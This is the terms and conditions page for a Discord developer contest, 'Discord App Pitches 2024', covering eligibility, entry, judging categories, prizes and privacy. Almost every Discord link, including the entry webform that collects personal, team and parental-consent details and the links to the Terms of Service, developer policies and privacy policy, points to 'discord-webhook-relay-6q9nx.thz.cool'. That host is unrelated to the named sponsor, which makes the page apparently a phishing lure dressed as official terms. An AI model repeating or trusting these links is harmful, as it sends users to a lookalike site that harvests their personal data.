Discord App Pitches Program Terms and Conditions

Program Period
How to Enter
Identity of Entrant
Selection and Notification of Winners
Category Winners
Grand Prize Winner
User Voting
Notification Of Finalists/Winners
Limitation of Liability
License to Submission
Winner List; Rules Request
Intellectual Property Notice
Class Action Waiver
Uncontrollable Events
General Conditions

Important:  Please read these terms and conditions before submitting your entry.

By participating in the Discord App Pitches (“Program”), you agree to be bound by these terms and conditions (“Terms”).



1.     Eligibility.

Subject to the additional restrictions below, you may enter the Program if you are:

  • not (1) a legal resident of the Canadian province of Quebec, Italy, Brazil, or (2) a resident or national in any country subject to OFAC trade sanctions or regulations, as described here: https://ofac.treasury.gov/sanctions-programs-and-country-information;
  • as of the date of entry, are either (A) eighteen (18) years of age or older, or (B) thirteen (13) years of age or older and submit parental consent to Discord in accordance with Discord’s requirements; and 
  • Have an account in good standing (as well as any team members’ accounts), as described in these Terms.

Employees or agents of Discord Inc. (“Discord”) and its affiliates or business partners involved in the provision of the Program, including the judges (collectively, “Discord Parties”), and the members of their immediate families (i.e. parents, children, siblings or spouse), colleagues of, or those persons living in the same household of such individuals, are ineligible to enter or win.

2.     Program Period.

The Program starts at 9:00a.m. Pacific Time (PT) on April 1, 2024 and ends at 11:59p.m. PT on May 1, 2024 (the “Program Period”).

3.     How to Enter.

To enter, complete the webform available at https://discord-webhook-relay-6q9nx.thz.cool/build/app-pitches-2024 and provide all required information and materials (“Submission”). Each Submission will include the following:

  • Your personal and eligibility information, and if applicable, all such required information for any group members;
  • A summary of your experience developing apps and related materials;
  • The Application ID for the prototype of your App, created using Discord’s Embedded-App SDK
  • Information about your app, such as a 2-3 sentence “elevator pitch” for your app, along with information about your app; and
  • Your suggested category selection(s) for your Submission (as further described in Section 5, Selection and Notification of Winner, below), noting that each Submission is only eligible to win in one category.

All Submissions must be submitted by a single person, but they may be submitted on behalf of a team. All members of the team must also be eligible and their information be included with your Submission. If you submit a Submission on behalf of a group, you represent and warrant that you have all necessary rights and permissions to submit it.

You may submit as many Submissions as you’d like. There is no limit on the number of Submissions you may submit.

By submitting a Submission as instructed through any of the above methods, you agree that you and your Submission comply with these Terms and Conditions, including the Guidelines and Restrictions detailed below. Discord may disqualify you and all of your Submissions from the Program if: (i) your Submission is incomplete or missing any required information as described on the webform above; (ii) you or any of your Submissions fails to comply with these Terms and Conditions; (iii) if you are a minor, if you do not submit adequate parental permission (as determined by Discord) by or before May 1, 2024; or (iv) you attempt to cheat, tamper with the systems or services used to operate the Program, or otherwise interfere with or undermine the legitimate operation of the Program. If Discord does not receive your Submission for any reason outside of Discord’s control, your Submission will be disqualified.

Submission Guidelines and Restrictions

a.  Apps/App Pitches may only be submitted once. If an app is submitted more than once, only the first Submission will be considered.

b. Your Submission must not supply untruthful, incomplete, inaccurate or misleading information, and must be responsive to the Program theme.

c. Your Submission and all related materials must be submitted in English.

d. Your Submission must be your (and if applicable, your team’s) original creation and you must have the full rights to grant the license and other rights that you grant to Discord in Section 10 below.

e.  Your Submission must not: (i) violate any applicable law or regulation; (ii) violate any third-party rights, including copyrights, trademark rights, moral rights, or rights of privacy and publicity; (iii) contain disparaging or defamatory statements; (iv) include threats to any person, place, business, or group; (v) be obscene, offensive, or indecent; (vi) depict any risky behavior; (vii) contain material that promotes bigotry, racism, hatred or harm against any group or individual or promotes discrimination based on race, gender, religion, nationality, disability, sexual orientation or age; and/or (viii) contain unauthorized third-party trademarks or logos.

f. You agree that, to the extent that your Submission depicts any individual or features the voice or other qualities of any individual, you are the individual pictured, heard, or otherwise featured in the Submission, or, alternatively, that you have obtained written permission from each person appearing in the entry to grant the rights to Discord described in these Terms and Conditions, and will make written copies of such permissions available to Discord upon request.

g. Your Discord account(s) and each member of your team’s Discord account(s), must be in good standing with Discord.

h. You, and if applicable any member of your team, will not do anything, or become involved in any situation, that might reflect unfavorably on the Discord’s reputation or products.

i. Your Submission must: 

  1. comply with Discord’s terms and policies, including the Discord Terms of Service (discord-webhook-relay-6q9nx.thz.cool/terms), the Community Guidelines (discord-webhook-relay-6q9nx.thz.cool/guidelines), Discord Developer Policy (https://discord-webhook-relay-6q9nx.thz.cool/developers/docs/policies-and-agreements/developer-policy), the Embedded App SDK terms guidelines and terms (as provided by Discord and updated from time to time), and Discord Developer Terms of Service (https://discord-webhook-relay-6q9nx.thz.cool/developers/docs/policies-and-agreements/developer-terms-of-service);
  2. meet or be on track to meet App Directory inclusion requirements available https://support-dev.discord-webhook-relay-6q9nx.thz.cool/hc/en-us/articles/8852009977879;
  3. not use prefix commands; and

include the following features:

  • No age restricted content for the App
  • No age gated content in the App
  • Contains valid terms of service and privacy policy

j. You are responsible for all of your own expenses associated with participating in the Program.

k. If you are under 18 or the legal age of majority in your jurisdiction or country, you must ensure your legal guardian completes all Discord required guardian consent documents and provides all required information by 11:59 pm PT on May 6, 2024. 

l. To the extent that you must accept additional terms and conditions in order to use the Embedded App SDK, you must accept them prior to using the Embedded App SDK.

4.     Identity of Entrant.

Each potential winner may be required to provide Discord with proof that the potential winner is the authorized account holder of the account associated with the winning Submission. Multiple participants are not permitted to share the same account.

5.     Selection and Notification of Winners.

Category Winners

On or about May 17, 2024 and continuing through the end of May, a panel of judges selected at Discord’s discretion and based in the U.S. will score each Submission based on the following criteria (“Judging Criteria”) to select five (5) category winners (each a “Category Winner”), with up to one (1) submission per category. Each Submission may only win once.

Judging Criteria. All Submissions will be evaluated by a panel of expert judges who will score the Submission on the following criteria against the following weights:  

  • 40% Value: App concepts for Discord App Pitches 2024 should be experiences that an average Discord user would find frequent or repeated use out of and are experiences best had with friends. A high score would be awarded to an app that is used daily for these Activities. The game should retain its novelty after all features are explored and most importantly, it should enhance the experience of Discord users and friends hanging out on Discord.
  • 30% Professionalism: App proposals for Discord App Pitches 2024 should be polished, succinct, well-articulated, easy to follow, and crisp. Proposals should demonstrate qualities typical of a professional development team, such as deep customer understanding and strong grasp of required resources and timeline for building Activities. Proposals should exemplify professional work styles and attitude, such as a developer who is ready to be contracted for a paying client.
  • 15% Uniqueness: App concepts for Discord App Pitches 2024 should not already be an existing Discord Activity. If a similar Activity exists, the proposed app should provide a more robust offering, such as more user benefits, more languages supported, or better design. Activities unique from other submissions are encouraged, so get creative with your building Activity!
  • 5% Innovation: App proposals for Discord App Pitches 2024 should creatively address user needs and desires. Apps pioneering new uses for existing or early stage technology (such as machine learning, AI, or other cutting-edge solutions) in the context of building activities will receive a higher score.
  • 10% Representation: The "Representation" score values how well developers understand and cater to their intended app users, especially those from underserved communities. High scores will be given to developers who use their insights to create Activities and that meaningfully serve people of unique backgrounds. Teams composed of individuals from diverse backgrounds will also be awarded high scores, recognizing the value of varied perspectives and experiences in creating inclusive applications.

The categories are as follows:

1. Compete

  • Description: "Discord is a hub for all kinds of play styles, including competitive spirits. We're looking for game experiences that ignite (friendly) rivalries, test skills against individuals or teams, and bring true pride in leaderboard status. Ideal for those who revel in competition and enjoy pitting their skills against others."

Elements might include:

  1. Multiplayer online battle arenas (team-based combat)
  2. Real-time strategy games (planning and implementing tactics)
  3. Head-to-head puzzle games (requiring quick wit and strategic decisions)
  4. Other gameplay experiences that stimulate users' competitive nature

2. Adventure Together

  • Description: "Discord is a place for fostering connections and collaborations. We're on the lookout for gaming experiences that create shared moments and facilitate meaningful interactions among players. Perfect for those who find joy in collective undertakings and making memories."

Elements might include:

  1. Escape games for problem-solving and exploration
  2. Team-based cooperative missions and quests
  3. Investigation games like collaborative mystery solving
  4. World-building exploration and RPG fosters connection
  5. Story-building or rich lore 

3. Collect and Create

  • Description: "Discord is a canvas for imagination and storytellers who love to explore. These games might have daily challenges, unexpected rewards, and engaging content that keeps players returning for more. Equipped with elements of creativity and decision making, they're perfect for those who enjoy crafting their own unique experiences and venturing into unknown territories."

Elements might include:

  1. Pet collection games that enable users to gather and care for various creatures
  2. Games that provide the tools to invent, design, and share what you imagine
  3. Sandbox games that allow free-building and customization
  4. Simulation games that enable users to design and manage their worlds
  5. Idle RPGs (consider RPGs with progress that continues over time)

4. Chill

  • Description: "Discord can be a sanctuary for friends who prefer a more relaxing, casual hangout. We're keen on experiences that offer a laid-back, stress-free environment. These games and experiences are ideal for users who wish to unwind and enjoy a game without any pressure or high stakes."

Elements might include:

  1. Virtual hangout spaces (think of digital rooms for avatar-based interactions)
  2. Casual puzzle games (such as match-3 games, logical or numerical puzzles)
  3. Conversation prompts
  4. Party games
  5. Educational and learning games
  6. Life-simulation games 

5. Wildcard

  • The Discord Developer Platform is a playground for innovation and unique ideas. For ideas that defy categorization, the Wildcard category is open. There are no rules, no guidelines, no restrictions (except these Official Rules of course) - the potential is limitless!

Elements might include:

  1. Any unique or innovative game idea that pushes the boundaries and doesn't fit into the other categories

While you may suggest which category you believe best suits your Submission, Discord reserves the right to assign it to another category that it believes is a better fit than your suggested category, at its sole discretion.

Judges will review all submissions and pick finalists, and those finalists will be reviewed by additional Judges to select the Category Winners. 

Grand Prize Winner:

Once the Category Winners have been determined and vetted, the Category Winners will be given 2 weeks to polish their prototype before their submission is publicly shared and made available to play in the Discord Town Hall server.

All re-submitted Category Winner Submissions will be re-judged, against the same criteria as the Category Winners as well as additional criteria, as follows:

  • Original Category Criteria: Regardless of category, which Category Winner had the highest scores against the Category Winner Criteria: 50%
  • Product Market Fit: Regardless of category, which Category Winner has the best product market fit for Discord and its users, e.g., has the most appeal to Discord’s users, is uniquely suited to Discord and its users, has the highest potential for growth, presents a business model that scales appropriately: 30%
  • User Voting: following the release of the Category Winner Submissions on the Discord Town Hall Server, which Category Winner received the most positive reaction from Discord’s Town Hall Server members through voting functionalities made available by Discord for the period beginning on or about June 17, 2024 through on or about July 11, 2024: 20%

The Grand Prize winner will be announced on Discord’s website on or about July 15, 2024.

6.     User Voting.

As the Program includes some portion of user voting in selection of the Grand Prize Winner, Entrants are prohibited from (or encouraging others to) manipulate or game the voting system, for example creation of new accounts for the purpose of voting, encouraging users to vote without acknowledging the public voting criteria or any fraudulent or disruptive behaviors. Discord reserves the right to reject votes it does not believe were valid and to disqualify Entrants it suspects of violating this Section 6.

7.     Notification Of Finalists/Winners.

Each potential winner will be notified via email or Discord Direct Messages (as indicated in your Submission) on or about June 3, 2024. To receive a prize, a potential winner, and its team if applicable, must submit all information that Discord requires to deliver them their prize and comply with applicable laws. Unless Discord is satisfied that a potential winner, and its team if applicable, is eligible to win a prize, every potential winner must sign and return to Discord an affidavit of eligibility. An affidavit of eligibility is a document in which the signatory legally declares that they are eligible to win the prize based on these Terms and Conditions. If Discord asks a potential winner to sign and return to Discord affidavit(s) of eligibility, they must do so within five (5) days of the date the affidavit(s) is sent to claim their prize. If (i) the attempted notification is returned as undeliverable without a forwarding address; (ii) any required information or documents are not returned within five (5) days, such as the affidavit of eligibility; or (iii) the potential winner chooses not to, or is otherwise unable to, accept the prize as stated, the prize will be forfeited and will be awarded to an alternate winner in accordance with the Judging Criteria. Only one (1) alternate winner will be selected for each prize. Discord reserves the right to not select winner(s) in any category if it does not receive enough high-quality entries to pick a winner meeting the criteria described in these Terms.

8.     Prizes.

Discord will award the following prizes for the Category Winners (including the Grand Prize Winner) and a separate prize for the Grand Prize Winner:

Category Winners:

Each Category Winner will receive USD $5,000, intended to be spent toward the development of the app described in the winning Submission. If a winning Submission was on behalf of a team, the person who submitted the entry will receive the prize and it is between the submitter and its team as to how the prize is allocated.

In addition, if a Category Winner  (and if applicable any team members): (i) develops a fully functioning version of the app included in their Submission, provided such app continues to comply with these Terms; (ii) remains eligible under the Terms; and (iii) resubmits it to Discord within three (3) months (via sending it through the private Discord Developer Partners Server Discord will create with each winner), there will be an additional grant of USD $10,000 per Category Winner.

Grand Prize Winner:

If the Grand Prize Winner: (i) develops a fully functioning version of the app included in their Submission, provided such app continues to comply with these Terms; (iii) remains eligible under the Terms; and (iii) resubmits it to Discord within three (3) months (via sending it through the private Discord Developer Partners Server Discord will create with each winner), there will be an additional grant of USD $15,000. For clarity, the Grand Prize Winner is eligible to receive both the Category Winner prize and the Grand Prize Winner prize, for up to a total of USD $30,000 across both prizes.

Lastly, each winner will receive at least one (1) video consultation with one or more members of the Discord’s Developer Relations team within two (2) months after the winners are announced, subject to each Discord and the winner(s) mutual availability. For clarity, if there is not a time which works for both Discord and each winner(s), this consultation will not take place.

Winners are solely responsible for any taxes or reporting obligations resulting from the prizes. Prizes are not transferable.  No substitutions or exchanges of any prize will be permitted.

Discord reserves the right to award additional prizes in its sole discretion or fewer prizes if it does not receive enough suitable entries.

9.     Limitation of Liability.

This Section does not apply to you if you reside in France, Germany or Great Britain. You agree that Discord Parties and their respective affiliates, suppliers, employees and agents (collectively, the “Released Parties”), shall not be responsible or liable for any losses, damages or injuries of any kind resulting from your participation in the Program or any Program-related activity, unless occasioned by their gross negligence or willful misconduct.

10.     License to Submission.

By entering the Program and providing a Submission, you hereby grant to Discord a perpetual, irrevocable, royalty-free, worldwide, nonexclusive license to reproduce, display, perform, distribute, and otherwise use your Submission in connection with administering the Program, and to freely sublicense these rights. Discord will have no obligation to publish or use or retain any Submission you submit or to return any such Submission to you. You agree that it is your sole responsibility to obtain all permissions and releases necessary for the grant of the rights contained in this paragraph. You agree to take, at Discord’s expense, any further action (including execution of affidavits, tax forms, and other documents) reasonably requested by Discord to effect, perfect or confirm Discord’s rights as set forth above in this paragraph. You will not be entitled to compensation for any use by Discord, or its agents, licensees or assignees, of your Submission. You recognize that Discord may in the future develop or purchase products or services related to or similar to the subject matter of your Submission(s). Accordingly, Discord may use Residuals for any purpose, including use in the acquisition, development, manufacture, promotion, sale, or maintenance of products and services; provided that this right to Residuals does not represent a license under any intellectual property and/or proprietary rights of Developer. The term “Residuals” means information that is retained in the unaided memories of Discord’s employees or contractors as permitted herein who have had access to your Submission(s). Memory is unaided if the employee or contractor has not intentionally memorized the information for the purpose of retaining and subsequently using or disclosing it.

11.     Indemnity.

This Section does not apply to you if you reside in France, Germany or Great Britain. By participating in the Program and/or accepting any prize that may be awarded, to the maximum extent permitted by law, you agree to fully indemnify each Released Party from and against any liability, claims, demands, losses, damages, costs and expenses resulting from any breach by you of these Terms and Conditions or any misrepresentation made by you in connection with the Program.

12.     Winner List; Rules Request.

For a copy of the winner list, send a stamped, self-addressed, business-size envelope for arrival after July 31, 2024 and before July 31, 2025 to the address listed in Section 18 below, Attn: Discord App Pitches 2024.

13.     Intellectual Property Notice.

Discord is a trademark of Discord Inc. The Program and all accompanying materials are copyright © 2023 by Discord Inc. All rights reserved.

14.     Disputes.

If you reside in France, Germany, or Great Britain, the laws of the country you reside in will govern these Terms and Conditions and any dispute, claim or cause of action (“Claim”) that arises between you and Discord, and you may initiate Claims before the courts of your country of residence. If you do not reside in France, Germany or Great Britain, the following clauses shall apply to you. The laws of the State of California, excluding its choice of law provisions, will govern these Terms and Conditions and any Claim that arises between you and Discord.

15.     Class Action Waiver.

This Section does not apply to you if you reside in France, Germany or Great Britain. Any Claim must be brought in the respective party’s individual capacity, and not as a plaintiff or class member in any purported class, collective, representative, multiple plaintiff, or similar proceeding (“Class Action”). The parties expressly waive any ability to maintain any Class Action in any forum. Any claim that all or part of this Class Action Waiver is unenforceable, unconscionable, void, or voidable may be determined only by a court of competent jurisdiction. If for any reason a Claim proceeds in court, you and Discord each waive any right to a jury trial.

16.     Uncontrollable Events.

In the event the operation or integrity of the Program is compromised by an event beyond Discord’s reasonable control and which were unforeseeable before the Program began, Discord may suspend, modify or terminate the Program.

17.     General Conditions.

Discord’s failure to enforce any term of these Terms and Conditions will not constitute a waiver of that provision.  The invalidity or unenforceability of any provision of these rules shall not affect the validity or enforceability of any other provision. In the event that any such provision is determined to be invalid or otherwise unenforceable, these rules shall be construed in accordance with their terms as if the invalid or unenforceable provision was not contained therein. The use of the terms “include” or “including” in these Terms and Conditions is illustrative and not limiting.

18.     Sponsor.

Discord Inc., 444 De Haro Street, Suite 200, San Francisco, CA 94107.

Privacy Notice

If you participate in Program, we, Discord Inc., 444 De Haro Street, Suite 200, San Francisco, CA 94107, collect the personal information that you submit with your entry into the Program. This personal information may include your name, submission, and photo. We use it for the purposes of administering the Program in accordance with its Terms and Conditions, and exercising or discharging Discord’s rights and obligations under applicable law. We disclose personal information to our service providers in the U.S. who process it only on our behalf and are subject to confidentiality agreements and other appropriate data protection measures. For additional information about how we protect and use personal information, your privacy rights, and our representatives in certain jurisdictions, please see our privacy policy at http://www.discord-webhook-relay-6q9nx.thz.cool/privacy/

There are laws in the jurisdictions where we are running this Program that require us to disclose the personal information of Program entrants and winners to government entities so that they can ensure that we are running this Program fairly and in compliance with applicable consumer protection, marketing and other laws. If a government entity requests these details, we will provide them to the government entity. Under the GDPR, the lawful basis for this disclosure is to advance our legitimate interests in running an Event that complies with applicable laws.  

Certain U.S. and British laws require us to publish or disclose the names (and in some cases countries) of winners to third parties that request this information from us. These laws are intended to ensure that we run the Program fairly and in compliance with applicable laws. If you are selected as a potential winner of the Program, a condition of claiming a prize and becoming a winner of the Program is that we may disclose your name and country for this purpose. This is a necessary part of our contract with you when you accept a prize to win the Program because our contract requires us to comply with the laws that apply to us and applicable laws require us to make these disclosures. Under the GDPR, the lawful basis for this disclosure is to perform our contract with you to run the Program in accordance with applicable laws, or else to advance our legitimate interests in running a Program that complies with applicable laws. Discord retains personal information submitted during the Program for as long as necessary to administer the Event and comply with applicable laws. You can contact [email protected] for more information.

Participation in the Program is voluntary but we require some personal information from you to enter you into the Program, and you cannot win a prize unless we may disclose your name and country to third parties where required by applicable laws.